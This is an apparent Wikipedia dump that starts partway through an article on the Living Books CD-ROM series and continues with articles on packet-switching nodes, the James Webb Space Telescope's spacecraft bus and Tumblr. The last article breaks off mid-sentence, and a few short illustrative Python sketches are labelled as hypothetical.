MacUser felt that Little Ark Interactive's pair of titles would be a "huge assist" to any parent struggling to answer the question 'What is the Bible' from a religious or a cultural perspective; it felt the titles could open the possibility for parent-child discussions on other races and religions. The magazine praised the way the programs told the simple story through fun, bright colours and entertaining music, adding, "it's rare to find such enjoyable music in a kid's game". MacAddict chose not to have public school children review the programs so as to maintain separation of church and state. It felt the titles were "charming" but lacked "real Bible education", commenting that their review by a multidenominational, ecumenical panel during development led to The Story of Creation being "watered down" to "just a bunch of singing and dancing [and] cute animations". Arizona Republic wrote that The Story of Creation presented the creation of the world in a "very basic way", and that players shouldn't "expect to be dazzled". Larry Blasko of the Associated Press noted that The Story of Creation is one of the most well-known Bible stories, and that it was impressive for Little Ark Interactive to be able to present it to children through "creative" software in a "clever and amusing way"; he felt the use of a child's voice was a "nice touch". Blasko added that The Story of Creation "shows no discernible denominational tilt", and the fact that God is never pictured means it "should pass muster for all flavors of doctrine". Logansport Pharos-Tribune praised Living Books' "associated group of titles". Of the Wanderful re-releases of Little Ark, Children's Technology Review described them as "bible stories that come to life, in the context of a solid 'Living Book' shell", praised their "effective language immersion experience", and suggested their use of slapstick humor "could actually make religion fun." Sunday Software noted that The Story of Creation was the only CD-ROM "in existence" for young children about creation, and commented that the "cute" program had "good graphics". Recommendations and scores Many reviewers directly recommended that their audience purchase Living Books. Technology & Learning wrote in the Weakness section of their review, "it is hard to find fault with a program that is as well thought out and entertaining as Just Grandma and Me". The Seattle Times wrote that Just Grandma and Me is "the best program I've seen for this age group". Publishers Weekly, in a review of Dr. Seuss' ABC, called that title "one of the best children's CD-ROMs to date". Compute! thought Living Books was a "rare piece of software that doesn't suffer at least a minor flaw or two". World Village deemed Arthur's Reading Race a "must-have program". PC Mag felt Ruff's Bone was the "best Living Books yet". MacUser opined "you can't go wrong" with Living Books or Humongous games. AllGame thought Stellaluna was "very entertaining and is sure to be a hit with children". PC Mag wrote that Broderbund had "scored a major hit" with Living Books. SuperKids' review of Green Eggs and Ham wrote that they "highly recommend the program for any child capable of grasping the story". Just Adventure "heartily recommended" Arthur's Computer Adventure for any "parents who wants to enjoy computer time with their children". Of The Tortoise and the Hare, All Game thought children of all ages would "enjoy this story a great deal". 
Reviewer Roger Frost felt Living Books, along with Sesame Street titles, had "enough plus points to make them powerfully magnetic". Daily Egyptian thought the titles were "standouts" while Deseret News called them "excellent". Parent's Choice said Arthur's Birthday was "one of the best ways you can spend 5 bucks for your child." The series has received consistently high review scores. Arthur's Teacher Trouble, The Tortoise and the Hare, Ruff's Bone, and Little Monster at School all received very high scores of over 90.00 in CD-ROMs Rated. MacUser's December 1994 issue contained reviews of all eight titles released at that point and scored each a 4 or 4.5 out of 5. All Game gave Arthur's Reading Race 4.5 stars out of 5. Just Adventure gave Arthur's Computer Adventure a top rating of A while All Game gave it 4/5 stars.
Awards
1992–1997 | Just Grandma and Me | Winner of over 16 awards since its release in 1992
1993–1997 | Arthur's Teacher Trouble | Winner of 15 awards since its release in 1993
1993 | Living Books | PC Magazine Award of Technical Excellence
1993 | Living Books | Popular Science Magazine Award of Technical Excellence
1993 | Living Books | PC Entertainment Magazine Special Achievement in Design Excellence
1994 | New Kid on the Block | National Educational Film and Video Silver Apple Award
1994 | The Tortoise and the Hare | Macworld Award for Best Entertainment CD in the Children/Young Adult's Category
1994 | The Tortoise and the Hare | NewMedia Magazine's Invision Multimedia Award, Gold in the Games, Edutainment Category
1994 | The Tortoise and the Hare | Macworld rated as "One of the Year's Top 10 CD-ROMs"
1994 | Ruff's Bone | Academy of Interactive Arts & Sciences' Cybermania Award for Outstanding Special Achievement
1994 | Ruff's Bone | Academy of Interactive Arts & Sciences' Cybermania Educational Award: Interactive Books
1994 | Living Books | Macworld World-Class Award
1994–1995 | Living Books | Software Publishers Association Technology and Learning Next in Series Award
1995 | Arthur's Birthday | National Educational Media Network's Gold Apple Award
1995 | Harry and the Haunted House | NewMedia Magazine's Bronze Invision Award for Technical/Creative Excellence, Best Audio/Soundtrack
1995 | Harry and the Haunted House | National Educational Media Network's Bronze Apple Award
1995 | Living Books | Macworld rated as "One of the Year's Top 10 CD-ROMs"
1995 | Living Books | Dr. Toy 100 Best Children's Products
1995 | Living Books | The Computer Museum Guide to the Best Software, Best Software for Kids
1996 | Sheila Rae the Brave | Macworld listed as a runner-up to "One of the Year's Top 10 CD-ROMs"
1997–98 | Arthur's Reading Race | Technology & Learning's Home Learning Software Award
1998 | Arthur's Computer Adventure | Newsweek Recommendation
2005 | Living Books | Technology & Learning's Awards of Excellence – Readers' Choice Award
2006 | Dr. Seuss's ABC | Technology & Learning's Award of Excellence
2007 | Sheila Rae, the Brave | Technology & Learning's Award of Excellence
2008 | Living Books | Home PC Editor's Choice 100 Top Products
2009 | Living Books | National Parenting Center Seal of Approval
2010 | Harry and the Haunted House | Children's Technology Review Editor's Choice Award
2011 | Arthur's Teacher Trouble | Children's Technology Review Editor's Choice Award
2012 | Wanderful's Ruff's Bone | Children's Technology Review Editor's Choice Award
2013 | Arthur's Birthday | Parents' Choice Gold Honor Award
2013 | Wanderful's Berenstain Bears Get in a Fight | Parents' Choice Gold Honor Award
2013 | Wanderful's Berenstain Bears In The Dark | Parents' Choice Gold Honor Award
2013 | Wanderful's The Tortoise and the Hare | Parents' Choice Gold Honor Award
2013 | Arthur's Teacher Trouble | Parents' Choice Silver Honor Award
2013 | Harry and the Haunted House | Parents' Choice Silver Honor Award
2013 | Ruff's Bone | Parents' Choice Recommended
2013 | Wanderful Storybooks Sampler | Parents' Choice Approved
2014 | The Berenstain Bears In The Dark | The Children's eBook Award for Best Bedtime App – Gold
2014 | The Berenstain Bears In The Dark | The Children's eBook Award for Best Special Needs Autism App – Gold
2014 | The New Kid on the Block | The Children's eBook Award for Best Special Education App – Silver
2014 | Little Monster At School | The Children's eBook Award for Best Special Education App – Bronze
2014 | Harry and the Haunted House | The Children's eBook Award for Best Adventure App – Silver
2014 | Arthur's Birthday | The Children's eBook Award for Best Birthday App – Bronze
2014 | Arthur's Teacher Trouble | The Children's eBook Award for Best Early Reader App – Gold
2014 | The Tortoise and the Hare | The Children's eBook Award for Best Early Reader App – Bronze
2014 | Little Ark Interactive's The Story of Creation | The Children's eBook Award for Best Early Learner App – Silver
2015 | Wanderful | Mom's Choice Gold Award
Little Ark Interactive awards
2014 | The Story of Creation | Children's Technology Review's Editor's Choice Award
2014 | Daniel in the Lion's Den | Children's Technology Review's Editor's Choice Award
Plot and gameplay Living Books are interactive storybooks – effectively a blend of computer games and hypertext fiction. They are "electronic versions of either narrative or expository texts that combine high quality animations and graphics with speech, sound, music, and special effect". Primarily using classic children's literature as source material, the series adapted these stories to CD and dressed them up with music, animation and real-voice narration. The games drew their appeal not from elaborate aesthetics but from the sheer joy of discovery. The plots are faithful to their respective books. 
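To make the page-and-hotspot model behind these interactive storybooks concrete, here is a minimal, hypothetical sketch; the class names, fields, and example data are illustrative only and are not taken from the Living Books engine. The two reading modes and the hotspot behaviour it mimics are described in more detail below.

```python
# Minimal, hypothetical model of an interactive storybook page: narrated story
# text plus clickable hotspots that trigger short animations or sounds. Names
# and data are illustrative and are not taken from the Living Books engine.
from dataclasses import dataclass

@dataclass
class Hotspot:
    region: tuple          # (x, y, width, height) of the clickable area
    animation: str         # animation or sound clip played when clicked

@dataclass
class StoryPage:
    text: str              # story text shown at the top of the page
    hotspots: list         # hidden surprises scattered around the scene

    def read_aloud(self):
        """'Read To Me' style: yield the text word by word for narration and highlighting."""
        for word in self.text.split():
            yield word     # a real engine would voice and highlight each word

    def click(self, x, y):
        """'Let Me Play' style: clicking inside a hotspot returns its animation."""
        for spot in self.hotspots:
            rx, ry, rw, rh = spot.region
            if rx <= x < rx + rw and ry <= y < ry + rh:
                return spot.animation
        return None

# Example page with one hidden hotspot.
page = StoryPage(
    text="Grandma and I went to the beach.",
    hotspots=[Hotspot(region=(40, 120, 60, 40), animation="crab_dance")],
)
print(list(page.read_aloud())[:3])   # ['Grandma', 'and', 'I']
print(page.click(50, 130))           # 'crab_dance'
```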
The games are generally adaptations of books from popular children's franchises such as Arthur, Berenstain Bears, and Dr. Seuss; however, three titles were created exclusively for Living Books rather than adapted from existing books: Ruff's Bone (co-produced by Colossal Pictures), Harry and the Haunted House, and a retelling of The Tortoise and the Hare. Interactive storybooks are a storytelling device that encourages kids to take part. Users are able to virtually turn the pages, click on various areas to get sound effects and short animation sequences, or click on words and sentences to hear them read aloud. The games allow players to read the book in US English, UK English, and other languages, or to have it read to them in each language by a narrator. Players are offered two ways of reading the story: Read To Me (only allowing players to flip pages) and Let Me Play (including player interaction). The former imitated a traditional storybook, with linear progression from beginning to end, while the latter offered a more compartmentalized experience, where children can pause to investigate the various worlds. The story text is written at the top of the page and highlighted as each word is read by the narrator; however, some additional character dialogue is not printed. After a child finishes reading a page, they can explore it by clicking on objects to see what they do. They can hear selected words or phrases by clicking on them. The screen "becomes a playground". Players experience animations and voice acting, while clicking on hidden hotspots reveals surprise animations, sound effects, songs, and sight gags. One page can have up to 44 active buttons and 5 navigational buttons. Each scene is self-contained and players can navigate page-by-page using the forward and backward cursor keys. The screen fades to black during the transition between scenes. The programs came with built-in customizing features to include, exclude, sequence, and vary the length of the games, or to adjust the speech. Many of the titles are accompanied by teacher guides with photocopiable resources. Little Ark Interactive titles follow a similar formula: the player can either choose 'Read-to-me' and have the narrator tell the story, supplemented by animations, or choose 'Let Me Play' and explore page by page, clicking on hotspots to reveal sight gags and music cues. Titles in the series Little Ark Interactive titles References External links Archived Main page Museum of Play archive 1992 video games 1993 video games 1994 video games 1995 video games 1996 video games 1997 video games 1998 video games Broderbund games Houghton Mifflin Harcourt franchises Random House Mattel ScummVM-supported games Children's educational video games Software for children Video game franchises introduced in 1992 Video games based on novels Video games developed in the United States
41481
https://en.wikipedia.org/wiki/Packet-switching%20node
Packet-switching node
A packet-switching node is a node in a packet-switching network that contains data switches and equipment for controlling, formatting, transmitting, routing, and receiving data packets. Note: In the Defense Data Network (DDN), a packet-switching node is usually configured to support up to thirty-two X.25 56 kbit/s host connections, as many as six 56 kbit/s interswitch trunk (IST) lines to other packet-switching nodes, and at least one Terminal Access Controller (TAC). Packets (information technology)
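To make the quoted capacity limits concrete, the following is a minimal, hypothetical Python sketch of a node-configuration check; the class and field names are illustrative only and are not taken from any DDN specification.

```python
from dataclasses import dataclass

# Illustrative limits taken from the DDN figures quoted above.
MAX_X25_HOSTS = 32      # up to thirty-two X.25 host connections
MAX_IST_TRUNKS = 6      # as many as six interswitch trunk (IST) lines
MIN_TACS = 1            # at least one Terminal Access Controller
LINE_RATE_KBITS = 56    # host and trunk lines run at 56 kbit/s

@dataclass
class PacketSwitchingNode:
    """Hypothetical model of one DDN packet-switching node's attachments."""
    x25_hosts: int = 0
    ist_trunks: int = 0
    tacs: int = 0

    def is_valid_configuration(self) -> bool:
        """True if the node respects the stated DDN limits."""
        return (0 <= self.x25_hosts <= MAX_X25_HOSTS
                and 0 <= self.ist_trunks <= MAX_IST_TRUNKS
                and self.tacs >= MIN_TACS)

    def aggregate_line_rate_kbits(self) -> int:
        """Total nominal rate of attached host and trunk lines, in kbit/s."""
        return (self.x25_hosts + self.ist_trunks) * LINE_RATE_KBITS

# Example: a fully loaded node.
node = PacketSwitchingNode(x25_hosts=32, ist_trunks=6, tacs=1)
assert node.is_valid_configuration()
print(node.aggregate_line_rate_kbits())  # 2128 kbit/s of attached line capacity
```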
52566668
https://en.wikipedia.org/wiki/Spacecraft%20bus%20%28James%20Webb%20Space%20Telescope%29
Spacecraft bus (James Webb Space Telescope)
The spacecraft bus is the primary support element of the James Webb Space Telescope, launched on 25 December 2021. It hosts a multitude of computing, communication, propulsion, and structural components. The other three elements of the JWST are the Optical Telescope Element (OTE), the Integrated Science Instrument Module (ISIM) and the sunshield. Region 3 of ISIM is also inside the spacecraft bus. Region 3 includes the ISIM Command and Data Handling subsystem and the Mid-Infrared Instrument (MIRI) cryocooler. The spacecraft bus must structurally support the 6.5 ton space telescope, while itself weighing only a small fraction of that. It is made primarily of graphite composite material. It was assembled in the U.S. state of California by 2015, and then it had to be integrated with the rest of the space telescope leading up to its planned 2018 launch. The bus can provide pointing precision of one arcsecond and isolates vibration down to two milliarcseconds. The fine pointing is done by the JWST fine steering mirror, obviating the need to physically move the whole mirror or bus. The spacecraft bus is on the Sun-facing "warm" side and operates at a temperature of about 300 kelvins (80°F, 27°C). Everything on the Sun-facing side must be able to handle the thermal conditions of JWST's halo orbit, which has one side in continuous sunlight and the other shaded by the spacecraft sunshield. Another important aspect of the spacecraft bus is the central computing, memory storage, and communications equipment. The processor and software direct data to and from the instruments, to the solid-state memory core, and to the radio system which can send data back to Earth and receive commands. The computer also controls the pointing and momentum of the spacecraft, taking in sensor data from the gyroscopes and star trackers, and sending the necessary commands to the reaction wheels or thrusters. Overview The bus is a carbon fibre box that houses a large number of major systems that keep the telescope functioning, such as the solar panels and computers. It also contains the MIRI cooler and some ISIM electronics. There are six major subsystems in the spacecraft bus: the Electrical Power Subsystem; the Attitude Control Subsystem; the Communication Subsystem; the Command and Data Handling Subsystem (C&DH), which includes the Command Telemetry Processor and the Solid State Recorder (SSR); the Propulsion Subsystem; and the Thermal Control Subsystem. The spacecraft bus has two star trackers, six reaction wheels, and the propulsion system (fuel tanks and thrusters). Two major tasks are pointing the telescope and performing station keeping for its metastable L2 halo orbit. Command and Data Handling (C&DH) The Command and Data Handling system includes a computer, the Command Telemetry Processor (CTP), and a data storage unit, the Solid State Recorder (SSR), with a capacity of 58.9 GB. Communications The communications dish, which can point at Earth, is attached to the bus. There is Ka-band and S-band radio communication. The Common Command and Telemetry System is based on the Raytheon ECLIPSE system. The system is designed to communicate with NASA's Deep Space Network. The main Science and Operations Center is the Space Telescope Science Institute in the U.S. state of Maryland. Rocket engines, attitude control The JWST uses two types of thrusters. The Secondary Combustion Augmented Thrusters (SCAT) use hydrazine and the oxidizer dinitrogen tetroxide as propellants. There are four SCATs in two pairs. One pair is used to propel the JWST into orbit, and the other performs station keeping in orbit. 
There are also eight Monopropellant Rocket Engines (MRE-1), so called because they use only hydrazine as fuel. They are used for attitude control and momentum unloading of the reaction wheels. JWST has six reaction wheels for attitude control, spinning wheels that allow the orientation to be changed without using propellant to change momentum. Finally, there are two titanium helium tanks to provide unregulated pressurant for all propellants. To detect changes in direction, JWST uses hemispherical resonator gyroscopes (HRG). HRGs are expected to be more reliable than the gas-bearing gyroscopes that were a reliability issue on the Hubble Space Telescope. They are less precise, however, a limitation that is compensated for by the JWST fine steering mirror. Thermal Thermal systems on the bus include the Deployable Radiator Shade Assemblies. There are two, one vertical (DRSA-V) and one horizontal (DRSA-H), with respect to the coordinate system of the spacecraft bus. The membrane that makes up the DRSA is a coated Kapton membrane. Other thermal elements on the outside include a small radiator for the battery. There is also a narrow lower fixed radiator shade, also made of coated Kapton membrane. The coating of the membrane is silicon and VPA. Other areas of the outside are covered with JWST multi-layer insulation (MLI). Electrical Power Subsystem (EPS) The Electrical Power Subsystem provides electricity to the JWST spacecraft. It consists of a set of solar panels and rechargeable batteries, a solar array regulator (SAR), a power control unit (PCU), and a telemetry acquisition unit (TAU). The solar panels convert sunlight directly into electricity. This raw power is fed to the SAR, which consists of four redundant buck converters, each operating with a maximum-power point tracking (MPPT) algorithm. While the output voltage is not tightly regulated, the buck converters will not allow the spacecraft main bus voltage to drop below about 22 volts or rise above about 35 volts. With every science instrument and all support circuits "on" simultaneously, about three of the four redundant converters would be needed to handle all of the power required. Typically one or two converters need to be operating at a time, with the other two on active standby. The Power Control Unit (PCU) consists mainly of electronic switches that turn each science instrument or support device on or off under control of the central computer. Each switch allows power to flow to its selected instrument from the SAR. Communication with the central computer is via a 1553 bus. In addition to the power switches, processors for the SAR MPPT algorithm are located in the PCU, along with some telemetry processors, processors to detect when the spacecraft has separated from the launch vehicle's upper stage, and some cryocooler controllers. The Telemetry Acquisition Unit (TAU) consists of electronic switches for various heaters on the "warm" side of the telescope. In addition, there are switches for the deployment actuators, and the bulk of the telemetry processors (e.g. measuring temperatures, electric power, fuel levels, etc.). The TAU communicates with the central computer via a 1553 bus. Both the PCU and TAU contain completely redundant systems, with one active while the other is in standby mode or completely off. The rechargeable batteries of JWST are of the lithium-ion type. The batteries use the Sony 18650 hard carbon cell technology. 
The batteries are designed to endure spaceflight and should sustain 18,000 charge-discharge cycles. Each solar panel support structure is a honeycomb carbon fiber composite. Some early configurations of the bus had two solar panel wings, one on each side. Part of the JWST program design was to allow different design variations to "compete" with each other. Structure Although the bus will operate in the weightless environment of outer space, during launch it must survive loads equivalent to 45 tons. The structure can support 64 times its own weight. The spacecraft bus is connected to the Optical Telescope Element and sunshield via the Deployable Tower Assembly. The interface to the launch vehicle is on the outside; taking the form of a cone, it, along with the payload adapter, transmits the weight and acceleration forces outward to the launch vehicle walls. The bus walls are made of carbon fiber composite and graphite composite. The bus is long without the solar arrays. From one edge of an extended radiator shade to another it is ; this includes the length of the two two-meter-wide radiator shades. The tail-dragger solar array is but it is normally held at an angle of 20° towards the sunshield. The array is in front of the sunshield deployment boom, which has a trim tab attached at its end. The bus structure itself weighs . Once JWST is launched, it begins to unfold and extend to its operating configuration. The plan is that during its first week the deployable tower will extend, separating the bus from the upper portion of the observatory by about 2 meters. Testing A software simulation of the Solid-State Recorder was developed for testing purposes, which supports the overall software simulation of JWST. This is called the JWST Integrated Simulation and Test (JIST) Solid State Recorder (SSR) Simulator, and was used to test flight software with SpaceWire and MIL-STD-1553 communication as it relates to the SSR. An Excalibur 1002 Single Board Computer ran the test software. The SSR simulator is an extension of the JWST Integrated Simulation and Test core (JIST) software, which brings together software simulations of JWST hardware with actual JWST flight software to allow virtual testing. The simulated SSR was created to support making a software test version of the JWST, to help validate and test the flight software for the telescope. In other words, rather than using an actual hardware test version of the SSR, there is a software program that simulates how the SSR works, which runs on another piece of hardware. The SSR is part of the Command and Data Handling Subsystem. Construction The spacecraft element is made by Northrop Grumman Aerospace Systems. The sunshield and bus were planned to be integrated in 2017. In 2014, Northrop Grumman began construction of several spacecraft bus components including the gyroscopes, fuel tanks, and solar panels. On May 25, 2016, the spacecraft's panel integration was completed. The overall spacecraft bus structure was completed by October 2015. The spacecraft bus was assembled at facilities in Redondo Beach, California, in the United States. The completed spacecraft bus was powered on for the first time in early 2016. The solar arrays completed a preliminary design audit in 2012, moving to the detailed design phase. Fuel and oxidizer tanks were shipped out for assembly in September 2015. 
In 2015, the communications subsystems, star trackers, reaction wheels, fine sun sensors, deployment electronics unit, command telemetry processors, and wire harnesses were delivered for construction. The spacecraft bus was assembled with the Spacecraft Element and the other parts in California. For launch, the spacecraft bus is attached to the Ariane 5 via a Cone 3936 plus ACU 2624 lower cylinder and clamp-band, and is contained within a launch fairing with a usable interior 4.57 meters (15 ft) in diameter and 16.19 meters (53.1 ft) long. Gyroscopes There are two main traditional uses for gyroscopes in a spacecraft: to detect changes in orientation, and to actually change the orientation. JWST uses a type of gyroscope known as a hemispherical resonator gyroscope (HRG). This design has no bearings, rubbing parts, or flexible connections. This is not a traditional mechanical gyroscope; instead, an HRG has a quartz hemisphere that vibrates at its resonant frequency in a vacuum. Electrodes detect shifts in the vibration pattern as the spacecraft rotates, providing the desired information on changes in orientation. The design is predicted to have a mean time to failure of 10 million hours. Gyroscopes failed on several occasions on the Hubble Space Telescope and had to be replaced several times. However, those were a different design, the gas-bearing gyroscope, which has certain benefits but experienced some long-term reliability issues. JWST has six gyroscopes, but only two are required for pointing. JWST does not need such precise gyroscope pointing because it has a Fine Steering Mirror that helps counter small motions of the telescope. The JWST telescope also has spinning reaction wheels, which can be adjusted to point the telescope without using propellant, as well as a set of small thrusters that can physically change the attitude of the telescope. The HRGs are sensors that provide information, while the reaction wheels and thrusters are devices that physically change the orientation of the spacecraft. Together they work to keep the telescope in the right orbit and pointed in the desired direction; a simplified sketch of this sense-and-actuate loop is given below. Docking ring In 2007, NASA said that JWST would also have a docking ring attached to the telescope to support JWST being visited by an Orion spacecraft if such a mission became viable. An example of such a mission would be one in which everything worked but an antenna did not fold out. Two noted cases where small problems caused issues for space observatories are the Spacelab 2 Infrared Telescope and the Gaia spacecraft; in each case stray material caused problems. On the Infrared Telescope (IRT) flown on the Space Shuttle Spacelab-2 mission, a piece of mylar insulation broke loose and floated into the line of sight of the telescope, corrupting data. This was on STS-51-F in 1985. Another case was in the 2010s on the Gaia spacecraft, for which some stray light was identified coming from fibers of the sunshield protruding beyond the edges of the shield. Integration The spacecraft bus is integrated into the whole JWST during construction. The spacecraft bus and the sunshield segment are combined into what is called the Spacecraft Element, which is in turn combined with the joined structure of the Optical Telescope Element and Integrated Science Instrument Module, called OTIS. That is the whole observatory, which is mounted to a cone that connects the JWST to the upper stage of the Ariane 5 rocket. The spacecraft bus is where that cone connects to the rest of JWST. 
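The sense-and-actuate loop described in the Gyroscopes section above can be sketched in a few lines. This is a minimal, hypothetical single-axis example; the proportional-derivative control law, gains, limits, and names are illustrative only and are not taken from JWST flight software.

```python
# Minimal, hypothetical sketch of the sense-and-actuate loop described above:
# gyroscopes (HRGs) report the measured attitude rate, an attitude error comes
# from the star trackers, and a simple PD law turns these into a reaction-wheel
# torque command. Gains, limits, and names are illustrative, not flight values.

KP = 0.8                 # proportional gain on attitude error (illustrative)
KD = 2.5                 # derivative gain on measured rate (illustrative)
MAX_WHEEL_TORQUE = 0.1   # wheel torque saturation limit, N*m (illustrative)
MOMENTUM_LIMIT = 20.0    # wheel momentum at which thrusters unload, N*m*s (illustrative)

def wheel_torque_command(attitude_error_rad: float, gyro_rate_rad_s: float) -> float:
    """PD control: torque that drives the pointing error and rate toward zero."""
    torque = -(KP * attitude_error_rad + KD * gyro_rate_rad_s)
    return max(-MAX_WHEEL_TORQUE, min(MAX_WHEEL_TORQUE, torque))

def needs_momentum_unload(wheel_momentum: float) -> bool:
    """Thrusters are fired to dump momentum once a wheel approaches saturation."""
    return abs(wheel_momentum) >= MOMENTUM_LIMIT

# One control step for a single axis.
torque = wheel_torque_command(attitude_error_rad=1e-4, gyro_rate_rad_s=-2e-6)
print(torque)   # small corrective torque, clipped to the wheel's capability
```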
See also Satellite bus James Webb Space Telescope timeline Attitude control Spacecraft design Spacecraft thermal control Solar panels on spacecraft On-board data handling References External links Picture of the bus under construction Page 18 has some diagrams of the Bus James Webb Space Telescope
18701436
https://en.wikipedia.org/wiki/Tumblr
Tumblr
Tumblr (stylized as tumblr and pronounced "tumbler") is an American microblogging and social networking website founded by David Karp in 2007 and currently owned by Automattic. The service allows users to post multimedia and other content to a short-form blog. Users can follow other users' blogs. Bloggers can also make their blogs private. For bloggers, many of the website's features are accessed from a "dashboard" interface. As of July 2021, Tumblr hosts more than 529 million blogs. History Development of Tumblr began in 2006 during a two-week gap between contracts at David Karp's software consulting company, Davidville. Karp had been interested in tumblelogs (short-form blogs, hence the name Tumblr) for some time and was waiting for one of the established blogging platforms to introduce their own tumblelogging platform. As none had done so after a year of waiting, Karp and developer Marco Arment began working on their own platform. Tumblr was launched in February 2007, and within two weeks had gained 75,000 users. Arment left the company in September 2010 to work on Instapaper. In June 2012, Tumblr featured its first major brand advertising campaign in conjunction with Adidas, who launched an official soccer Tumblr blog and bought placements on the user dashboard. This launch came only two months after Tumblr announced it would be moving towards paid advertising on its site. On May 20, 2013, it was announced that Yahoo and Tumblr had reached an agreement for Yahoo! Inc. to acquire Tumblr for $1.1 billion in cash. Many of Tumblr's users were unhappy with the news, causing some to start a petition, achieving nearly 170,000 signatures. David Karp remained CEO and the deal was finalized on June 20, 2013. Advertising sales goals were not met and in 2016 Yahoo wrote down $712 million of Tumblr's value. Verizon Communications acquired Yahoo in June 2017, and placed Yahoo and Tumblr under its Oath subsidiary. Karp announced in November 2017 that he would be leaving Tumblr by the end of the year. Jeff D'Onofrio, Tumblr's President and COO, took over leading the company. The site, along with the rest of the Oath division (renamed Verizon Media Group in 2019), continued to struggle under Verizon. In March 2019, SimilarWeb estimated Tumblr had lost 30% of its user traffic since December 2018, when the site had introduced a stricter content policy with heavier restrictions on adult content (which had been a notable draw to the service). In May 2019, it was reported that Verizon was considering selling the site due to its continued struggles since the purchase (as it had done with another Yahoo property, Flickr, via its sale to SmugMug). Following this news, Pornhub's vice president publicly expressed interest in purchasing Tumblr, with a promise to reinstate the previous adult content policies. On August 12, 2019, Verizon Media announced that it would sell Tumblr to Automattic—operator of blog service WordPress.com and corporate backer of the open source blog software of the same name—for an undisclosed amount. Axios reported that the sale price was less than $3 million, a significant decrease over Yahoo's original purchase price. Automattic CEO Matt Mullenweg stated that the site will operate as a complementary service to WordPress.com, and that there were no plans to reverse the content policy decisions made during Verizon ownership. Features Blog management Dashboard: The dashboard is the primary tool for the typical Tumblr user. It is a live feed of recent posts from blogs that they follow. 
Through the dashboard, users are able to comment, reblog, and like posts from other blogs that appear on their dashboard. The dashboard allows the user to upload text posts, images, videos, quotes, or links to their blog with a click of a button displayed at the top of the dashboard. Users are also able to connect their blogs to their Twitter and Facebook accounts; so whenever they make a post, it will also be sent as a tweet and a status update. Queue: Users are able to set up a schedule to delay posts that they make. They can spread their posts over several hours or even days. Tags: Users can help their audience find posts about certain topics by adding tags. If someone were to upload a picture to their blog and wanted their viewers to find pictures, they would add the tag #picture, and their viewers could use that word to search for posts with the tag #picture. HTML editing: Tumblr allows users to edit their blog's theme HTML coding to control the appearance of their blog. Users are also able to use a custom domain name for their blog. Mobile With Tumblr's 2009 acquisition of Tumblerette, an iOS application created by Jeff Rock and Garrett Ross, the service launched its official iPhone app. The site became available to BlackBerry smartphones on April 17, 2010, via a Mobelux application in BlackBerry World. In June 2012, Tumblr released a new version of its iOS app, Tumblr 3.0, allowing support for Spotify integration, hi-res images and offline access. An app for Android is also available. A Windows Phone app was released on April 23, 2013. An app for Google Glass was released on May 16, 2013. Inbox and messaging Tumblr blogs have the option to allow users to submit questions, either as themselves or anonymously, to the blog for a response. Tumblr also offers a "fan mail" function, allowing users to send messages to blogs that they follow. On November 10, 2015, Tumblr introduced an integrated instant messaging function, allowing users to chat with other Tumblr users. The feature was rolled out in a "viral" manner; it was initially made available to a group of 1500 users, and other users could receive access to the messaging system if they were sent a message by any user that had received access to the system itself. The messaging platform replaces the fan mail system, which was deprecated. The ability to send posts to others via the Dashboard was added the following month. In November 2019, Tumblr introduced "group chats"—ephemeral chat rooms surfaced via searches, designed to allow users to share content in real-time with users who share their interests. Posts disappear after 24 hours and cannot be edited. Original content In May 2012, Tumblr launched Storyboard, a blog managed by an in-house editorial team which features stories and videos about noteworthy blogs and users on Tumblr. In April 2013, Storyboard was shut down. In March 2018, Tumblr began to syndicate original video content from Verizon-owned video network go90, as part of an ongoing integration of Oath properties, and reported plans to wind down go90 in favor of using Oath properties to distribute its content instead. This made the respective content available internationally, since go90 is a U.S.-only service. Paid content On July 21, 2021, Tumblr launched Post+ for some beta users, allowing bloggers to monetize their content. Usage Tumblr has been noted for the socially progressive views of its users. 
In 2011, the service was most popular with the teen and college-aged user segments with half of Tumblr's visitor base being under the age of 25. In April 2013, the website received more than 13 billion global page views. User activity, measured by the number of blog posts each day, peaked at over 100 million in early 2014 and declined in each of the next three years, to approximately 30 million by October 2018. As of May 2019, Tumblr hosted over 465 million blogs and more than 172 billion posts in total with over 21 million posts created on the site each day. Adult content At the time of its acquisition by Yahoo, Tumblr was described by technology journalists as having a sizable amount of pornographic content. An analysis conducted by news and technology site TechCrunch on May 20, 2013, showed that over 22% of all traffic in and out of Tumblr was classified as pornography. In addition, a reported 16.45% of blogs on Tumblr exclusively contained pornographic material. Following July 2013 and its acquisition by Yahoo, Tumblr progressively restricted adult content on the site. In July 2013, Tumblr began to filter content in adult-tagged blogs from appearing in search results and tagged displays unless the user was logged in. In February 2018, Safe Mode (which filters "sensitive" content and blogs) became enabled by default for all users on an opt-out basis. On December 3, 2018, Tumblr announced that effective December 17, all images and videos depicting sex acts, and real-life images and videos depicting human genitalia or "female-presenting" nipples, would be banned from the service. Exceptions are provided for illustrations or art that depict nudity, nudity related to "political or newsworthy speech", and depictions of "female-presenting" nipples in relation to medical events such as childbirth, breastfeeding, mastectomy and gender reassignment surgery. The rules do not apply to text content. All posts in violation of the policy are hidden from public view, and repeat offenders may be reprimanded. Shortly prior to the announcement, Tumblr's Android app was patched to remove the ability to disable Safe Mode. The change faced wide criticism among Tumblr's community; in particular, it has been argued that the service should have focused on other major issues (such as controlling hate speech or the number of porn-related spambots on the service), and that the service's adult community provided a platform for sex education, independent adult performers (especially those representing LGBT communities who feel that they are under-represented by a heteronormative mainstream industry) seeking an outlet for their work, and those seeking a safe haven from "over-policed" platforms to share creative work with adult themes. Tumblr stated that it was using various algorithms to detect potential violations, in combination with manual reviews. Users quickly discovered a wide array of false positives. A large number of users scheduled protest actions on December 17. 
On the day the ban took effect, Tumblr issued a new post clarifying the new policy, showcasing examples of adult images still allowed on the service, and stating that it "fully recognized" its "special obligation" to serving its LGBT userbase, and that "LGBTQ+ conversations, exploration of sexuality and gender, efforts to document the lives and challenges of those in the sex worker industry, and posts with pictures, videos, and GIFs of gender-confirmation surgery are all examples of content that is not only permitted on Tumblr but actively encouraged." Wired cited multiple potential factors in the ban, including that the presence of adult content made the service unappealing to potential advertisers, the Stop Enabling Sex Traffickers Act (a U.S. federal law which makes websites liable for knowingly assisting or facilitating illegal sex trafficking), as well as heavy restrictions on adult content imposed by Apple for software offered on the iOS App Store (which similarly prompted several Reddit clients to heavily restrict users' ability to access forums on that site containing adult content). In January 2022, Tumblr reached a settlement with New York City’s Commission on Human Rights, which had claimed that the 2018 ban on adult content disproportionately affected LGBTQ+ users. The agreement required the company to review its algorithms, revise its appeals process and review closed cases, and train its human moderators on diversity and inclusion issues. Corporate affairs Tumblr's headquarters is at 770 Broadway in New York City. The company also maintains a 